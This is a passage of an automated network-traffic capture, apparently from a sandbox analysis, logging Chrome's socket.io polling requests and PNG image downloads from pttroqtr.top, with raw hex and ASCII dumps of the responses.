                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:37 UTC49OUTData Raw: 34 32 33 5b 22 6c 6f 67 69 6e 22 2c 22 75 73 65 72 2d 53 63 31 67 78 75 6a 34 54 4f 58 2d 78 6f 4e 32 41 45 66 32 22 2c 5b 22 75 73 65 72 22 5d 5d
                                                                                                                                                                                            Data Ascii: 423["login","user-Sc1gxuj4TOX-xoN2AEf2",["user"]]
                                                                                                                                                                                            2024-09-28 03:39:38 UTC198INHTTP/1.1 400 Bad Request
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:37 GMT
                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            2024-09-28 03:39:38 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            99192.168.2.5498288.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:37 UTC599OUTGET /help/layout/images/50.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:38 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:38 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 30380
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"76ac-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:38 UTC16073INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 76 39 49 44 41 54 78 da ec 9d 09 7c 15 d5 d9 ff cf cc dd ef cd be 87 04 12 08 fb 4e 02 84 7d 11 10 14 a1 8a 8a ad 56 da 17 fb 6a ab 6f 6d ab 6f b5 d5 f7 5f 6b 5b ed ab 7d b5 d5 b7 da 57 5b 68 a5 6a 5d 91 7d 91 7d 27 40 20 ec 04 08 24 24 21 fb 7e f7 3b f7 ce 7f ce 99 99 9b 9b 3d 81 90 05 7f df 8f 38 e7 de dc 99 39 73 e6 cc cc 6f 9e e7 9c e7 e1 44 51 24 00 00 00 00 00 a0 77 c1 41 c4 01 00 00 00 00 40 c4 01 00 00 00 00 00 88 38 00 00 00 00 00 00 11 07 00 00 00 00 00 11 07 00 00 00 00
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<v9IDATx|N}Vjomo_k[}W[hj]}}'@ $$!~;=89soDQ$wA@8
                                                                                                                                                                                            2024-09-28 03:39:38 UTC14307INData Raw: 72 88 0c 75 a6 e8 f4 a9 53 57 2e 5d fa 40 b3 a1 43 fe f0 c6 9f d8 98 ab f3 e7 cf cd 0c b2 04 91 b2 b2 f2 df d1 cf 45 45 d7 a5 7e 9d b6 b5 c3 d7 86 c1 60 53 04 ab 3f c3 01 9d 6d 69 32 18 6a ba a2 af 35 7e 31 d2 34 4a 4e df 0e 29 d7 40 53 f4 89 8f 67 22 2e 21 21 7e 95 d4 36 cb e4 47 b0 67 88 24 7c 5a 7c 0e 37 9c 62 ab ba 42 bd 6c bb a3 47 8f 66 f5 b9 70 3e fb c2 49 c7 69 f6 ac 0a 0e 0a 2a 8e 8d 8b 3f d9 f4 85 41 6c e6 35 b2 99 c7 87 57 d4 7a 94 21 1a 54 34 f6 4b ea fb e6 a8 11 23 3e a3 9f e7 cf bf 33 a3 b9 75 be f8 72 f5 e2 3d 7b f6 31 11 c7 73 1a 52 67 b5 c5 6d de bc 85 09 f8 bb ee 5a 90 d1 a5 ba 8a 00 00 00 00 00 80 5e 47 97 5a e2 44 83 f4 86 a4 d1 74 e9 01 72 4c cb d7 6b 70 6f 65 75 72 4f 3c 11 de b2 b2 91 c4 dd 2d b1 02 09 af 24 fb d5 a6 f4 cf e1 a3 a2
                                                                                                                                                                                            Data Ascii: ruSW.]@CEE~`S?mi2j5~14JN)@Sg".!!~6Gg$|Z|7bBlGfp>Ii*?Al5Wz!T4K#>3ur={1sRgmZ^GZDtrLkpoeurO<-$


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            100192.168.2.5498298.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:37 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjcG1&sid=H_Y22m0FJjANkstPAEf3 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:38 UTC198INHTTP/1.1 400 Bad Request
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:38 GMT
                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            2024-09-28 03:39:38 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            101192.168.2.5498318.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:37 UTC599OUTGET /help/layout/images/51.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:38 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:38 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 23451
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"5b9b-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:38 UTC16073INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 5b 28 49 44 41 54 78 da ec bd 7f 88 63 db 7d e0 79 ae aa c3 e6 85 81 aa c7 fc 31 ed c1 4b cb 79 0f 4c c0 d0 6a c6 2c 31 76 5c 6a 86 90 b0 93 a1 ab 5f 63 9c 64 02 a5 ee f6 1f 5e 70 e8 ea cd 06 ff 88 b3 ad 5e db f9 c1 24 69 35 09 24 7f f8 bd 52 41 c6 b1 d7 74 77 35 c9 2e 33 13 c2 53 39 0e 09 83 e1 55 91 40 30 3c fb a9 20 c4 3d 2c c1 55 30 e4 25 b8 4b 77 ef f7 ea 7b 5a 47 47 e7 4a 57 d2 55 49 aa fa 7c 40 5d 5d 2a 49 f7 de 73 af 74 3e fa 9e 73 be df 28 8e 63 03 00 00 00 00 cb 45 84 c4
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<[(IDATxc}y1KyLj,1v\j_cd^p^$i5$RAtw5.3S9U@0< =,U0%Kw{ZGGJWUI|@]]*Ist>s(cE
                                                                                                                                                                                            2024-09-28 03:39:38 UTC7378INData Raw: 61 79 8c ae a9 e8 65 75 e6 15 4f 42 ec 84 fc e6 12 1c fe 35 7f 3f f5 18 9a 2a 4b f7 f4 f6 a6 77 93 e5 eb 62 6c 5b a6 37 97 ed be de a4 2d cb 76 18 5a e7 c9 b5 1c 51 be 6a ba 73 dd 36 32 e4 c9 56 8a d8 34 bd a1 d4 03 5d 55 5c d6 fb 77 bd f3 51 9b 41 db 34 3d 69 0d 9e 73 e5 50 23 88 b2 ef 77 10 38 00 00 58 64 2e 9c a5 83 51 41 30 26 3b 22 67 27 ea ef 9a e1 93 d5 6d 87 9f 2e 91 17 f9 5b f0 b9 4f 76 a5 a7 2b 51 6e 71 f6 ab ce 9f ac a0 c8 10 8a 1c d3 ee b0 48 a3 53 be 6b 53 9f 73 d3 e6 4e d3 95 b2 0f 32 e6 0f 5a b9 b3 43 bc eb 8e a4 d9 9f 75 d3 9b 2f 77 dd f4 0f ed 4e 8d 4a fb e5 21 12 e7 0f 37 37 54 30 9b 08 1c 00 00 2c 3a a5 b3 76 40 4e 44 ee 38 f0 e7 34 b2 e6 ac d6 74 a9 7a bf b7 3c f9 5b 5b e0 c3 de 55 d9 6c e8 8a d2 2d d3 ab ed d9 d0 b9 7e 47 2a 27 22 70
                                                                                                                                                                                            Data Ascii: ayeuOB5?*Kwbl[7-vZQjs62V4]U\wQA4=isP#w8Xd.QA0&;"g'm.[Ov+QnqHSkSsN2ZCu/wNJ!77T0,:v@ND84tz<[[Ul-~G*'"p


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            102192.168.2.5498308.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:37 UTC361OUTGET /help/layout/images/49.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:38 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:38 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 10988
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"2aec-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:38 UTC10988INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 2a 79 49 44 41 54 78 da ec dd 4f 52 db e8 1a 2f 60 f5 ad 3b 27 3b 80 33 e8 31 9c 15 e0 ac 20 ee 71 aa 1a 67 05 a1 57 80 59 41 c8 0a 62 ba 2a e3 43 56 80 59 41 93 71 06 c7 ac e0 86 15 e4 ea 6d 3e 4e bb 69 4b 96 6c c9 96 ec e7 a9 72 25 85 8d 2c 7d 92 d1 cf df df 9f 7e fc f8 91 01 00 d0 2f ff 47 11 00 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<*yIDATxOR/`;';31 qgWYAb*CVYAqm>NiKlr%,}~/GqqqBBB qqq


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            103192.168.2.5498338.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:38 UTC669OUTPOST /socket.io/?EIO=4&transport=polling&t=P8sjcgz&sid=H_Y22m0FJjANkstPAEf3 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Content-type: text/plain;charset=UTF-8
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:38 UTC1OUTData Raw: 31
                                                                                                                                                                                            Data Ascii: 1
                                                                                                                                                                                            2024-09-28 03:39:38 UTC198INHTTP/1.1 400 Bad Request
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:38 GMT
                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            2024-09-28 03:39:38 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            104192.168.2.5498328.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:38 UTC361OUTGET /help/layout/images/47.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:38 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:38 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 22730
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"58ca-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:38 UTC16073INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 58 57 49 44 41 54 78 da ec bd 0b 78 1b e7 79 e7 fb cd 05 03 0c 40 12 24 05 89 ba d1 a4 dd 24 72 1c db a4 e2 c6 71 62 a5 62 da 26 f5 ba 49 c4 34 49 63 e7 62 d3 9b 38 69 9b 36 96 db ee 49 da 93 1e d1 bb 39 db ee d3 9e b5 ec ee d3 cd 73 ec 56 b4 93 ad 9d cb 49 a4 b4 4d d5 34 5d 53 b1 95 5a be 89 f4 55 92 25 8b 14 75 a3 08 e2 42 02 98 01 e6 f2 9d ef 1b 0e 48 10 04 49 90 04 71 21 ff bf 47 a3 01 07 83 99 c1 cc 60 e6 37 ef fb 5d 04 4a 29 01 00 00 00 00 00 b5 85 88 5d 00 00 00 00 00 00 89
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<XWIDATxxy@$$rqbb&I4Icb8i6I9sVIM4]SZU%uBHIq!G`7]J)]
                                                                                                                                                                                            2024-09-28 03:39:38 UTC6657INData Raw: 49 b6 df 4f 04 ea cc 3e 36 34 65 32 d2 68 2a 29 b5 98 86 e0 a4 b3 27 e3 06 a9 0b 7a 88 e2 93 b2 02 1c 7f e7 db 33 5f 63 2f bf e6 1e b3 69 a9 b6 2c 21 a6 eb a2 6e 5a c2 a3 37 ff f6 ab 8f e2 d7 09 4a 24 56 7b 20 71 60 95 1e 14 4a 55 4b d5 a9 e0 e0 f6 cd 0a 8a 00 e9 54 97 f7 dc f1 ca 6d c9 84 f4 e3 68 44 69 1d 1f f3 46 27 62 9e 11 5d 93 34 76 43 cd 6a 9a aa 27 e2 11 4a 29 2f cf 45 42 cd 86 d3 d4 46 3a 23 86 4f 9e f1 6a 4f 3f e7 55 4f 0f 39 02 77 4f 85 05 8e 4b d0 be 45 04 8e 47 df 78 5f aa 7b 0b 08 cf 9c 14 71 4a 17 5a 0b ac 6a 30 e0 a3 cf 14 bb 5d 49 8d 7c b1 d0 f4 8d 4d 74 74 b1 cf be f3 f6 37 fa 5d b9 7b 28 77 7a 81 d4 6a 45 d3 aa 3b 6e 3b c1 2f 3c 5d 7c df b0 87 81 96 c6 a6 0c 69 0e 65 c2 3e d5 d6 78 bb 7b 57 2e ea e1 64 92 0e b3 d7 da 8d ef 34 82 72 4e
                                                                                                                                                                                            Data Ascii: IO>64e2h*)'z3_c/i,!nZ7J$V{ q`JUKTmhDiF'b]4vCj'J)/EBF:#OjO?UO9wOKEGx_{qJZj0]I|Mtt7]{(wzjE;n;/<]|ie>x{W.d4rN


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            105192.168.2.5498348.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:38 UTC599OUTGET /help/layout/images/52.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:38 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:38 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 21895
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"5587-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:38 UTC16073INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 55 14 49 44 41 54 78 da ec bd 4f 8f 23 49 17 af 15 33 8c 90 90 90 aa 5e 84 e6 22 dd 45 e5 88 0d 42 88 f2 a0 17 b1 01 55 f6 f2 02 9a 72 4b 17 84 10 52 65 6f d8 a1 76 8b 2d a2 5c 9f a0 dd ba 1f a0 b3 24 16 77 37 ee 61 81 58 b5 6b 07 d2 48 e3 e2 0b 8c 6b c1 82 77 33 2e 56 2c 40 8d 4f f5 89 f6 a9 a8 c8 7f 76 da 4e db cf 23 a5 aa db 7f d2 99 91 11 27 7e 71 e2 c4 89 ef be 7c f9 e2 00 00 00 00 60 bf f8 9e 22 00 00 00 00 40 c4 01 00 00 00 00 22 0e 00 00 00 00 10 71 00 00 00 00 88 38 00 00
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<UIDATxO#I3^"EBUrKReov-\$w7aXkHkw3.V,@OvN#'~q|`"@"q8
                                                                                                                                                                                            2024-09-28 03:39:38 UTC5822INData Raw: 5b 23 d7 6f d2 81 69 7a 98 eb c8 5b 4f fb 13 b7 19 db 24 ed 4a db e8 3e a4 3f 28 eb 5c 53 b7 da 74 5d 5a 47 24 76 d8 6e e4 ae 38 0e ee b6 66 de bf b1 8b ef ec d0 5b e1 9a 8a 52 4e 74 d1 7e 27 25 e5 d1 04 11 d1 1f 4b de 3f 44 11 57 e5 0c b8 0b a6 4b fd f3 bf ad 5a c4 b0 0f 1c d2 74 ea cc 7d 4d b8 3a 2d d9 b9 61 a2 22 6d a0 d3 7a 92 35 fb 67 f7 d5 63 24 ab e4 06 7e 3a 4b 83 d1 63 31 76 d7 1b de dd 61 d7 23 e9 98 80 13 a1 f6 da 18 61 bf 91 b5 f7 b2 f5 75 91 c6 a4 ec dc 5a 6e 33 15 71 d9 21 ac 48 6d 39 36 ec 7e 03 d7 97 b9 66 0b 1a 62 9d c2 3a 23 e0 55 0c f2 e3 0e 9f 67 5a 47 b8 55 0c 56 fa 2b fc 6e 12 b4 bb 7d 9b d6 ad 8a 83 ab eb f1 18 17 3c ff f3 15 da 5a ec 37 3f 6d 30 9c 63 9d f6 1b 13 71 f7 4d e3 86 55 ac 3c ac 20 16 f7 92 9a b9 e1 72 f3 79 3b 48 3c 88
                                                                                                                                                                                            Data Ascii: [#oiz[O$J>?(\St]ZG$vn8f[RNt~'%K?DWKZt}M:-a"mz5gc$~:Kc1va#auZn3q!Hm96~fb:#UgZGUV+n}<Z7?m0cqMU< ry;H<


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            106192.168.2.5498368.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:38 UTC361OUTGET /help/layout/images/48.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:38 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:38 GMT
                                                                                                                                                                                            Content-Type: image/png
